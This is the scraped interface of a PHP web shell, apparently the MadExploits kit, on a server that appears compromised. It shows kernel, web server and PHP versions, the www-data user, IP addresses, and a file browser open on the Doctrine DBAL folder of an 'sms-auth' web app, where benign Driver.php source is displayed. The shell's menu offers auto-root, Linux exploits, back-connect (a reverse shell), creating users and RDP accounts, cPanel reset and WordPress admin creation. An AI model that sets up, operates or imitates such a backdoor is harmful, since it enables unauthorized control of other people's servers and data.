Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-auth /
vendor /
doctrine /
dbal /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
ArrayParameters
[ DIR ]
drwxrwxr-x
Cache
[ DIR ]
drwxrwxr-x
Connections
[ DIR ]
drwxrwxr-x
Driver
[ DIR ]
drwxrwxr-x
Event
[ DIR ]
drwxrwxr-x
Exception
[ DIR ]
drwxrwxr-x
Id
[ DIR ]
drwxrwxr-x
Logging
[ DIR ]
drwxrwxr-x
Platforms
[ DIR ]
drwxrwxr-x
Portability
[ DIR ]
drwxrwxr-x
Query
[ DIR ]
drwxrwxr-x
SQL
[ DIR ]
drwxrwxr-x
Schema
[ DIR ]
drwxrwxr-x
Tools
[ DIR ]
drwxrwxr-x
Types
[ DIR ]
drwxrwxr-x
ColumnCase.php
429
B
-rw-rw-r--
Configuration.php
3.28
KB
-rw-rw-r--
Connection.php
56.63
KB
-rw-rw-r--
ConnectionException.php
969
B
-rw-rw-r--
Driver.php
1.35
KB
-rw-rw-r--
DriverManager.php
15.08
KB
-rw-rw-r--
Events.php
1.1
KB
-rw-rw-r--
Exception.php
5.08
KB
-rw-rw-r--
ExpandArrayParameters.php
3.62
KB
-rw-rw-r--
FetchMode.php
331
B
-rw-rw-r--
LockMode.php
419
B
-rw-rw-r--
ParameterType.php
982
B
-rw-rw-r--
Query.php
1.19
KB
-rw-rw-r--
Result.php
8.29
KB
-rw-rw-r--
Statement.php
6.62
KB
-rw-rw-r--
TransactionIsolationLevel.php
613
B
-rw-rw-r--
VersionAwarePlatformDriver.php
946
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Driver.php
<?php namespace Doctrine\DBAL; use Doctrine\DBAL\Driver\API\ExceptionConverter; use Doctrine\DBAL\Driver\Connection as DriverConnection; use Doctrine\DBAL\Driver\Exception; use Doctrine\DBAL\Platforms\AbstractPlatform; use Doctrine\DBAL\Schema\AbstractSchemaManager; /** * Driver interface. * Interface that all DBAL drivers must implement. */ interface Driver { /** * Attempts to create a connection with the database. * * @param mixed[] $params All connection parameters. * * @return DriverConnection The database connection. * * @throws Exception */ public function connect(array $params); /** * Gets the DatabasePlatform instance that provides all the metadata about * the platform this driver connects to. * * @return AbstractPlatform The database platform. */ public function getDatabasePlatform(); /** * Gets the SchemaManager that can be used to inspect and change the underlying * database schema of the platform this driver connects to. * * @return AbstractSchemaManager */ public function getSchemaManager(Connection $conn, AbstractPlatform $platform); /** * Gets the ExceptionConverter that can be used to convert driver-level exceptions into DBAL exceptions. */ public function getExceptionConverter(): ExceptionConverter; }
Close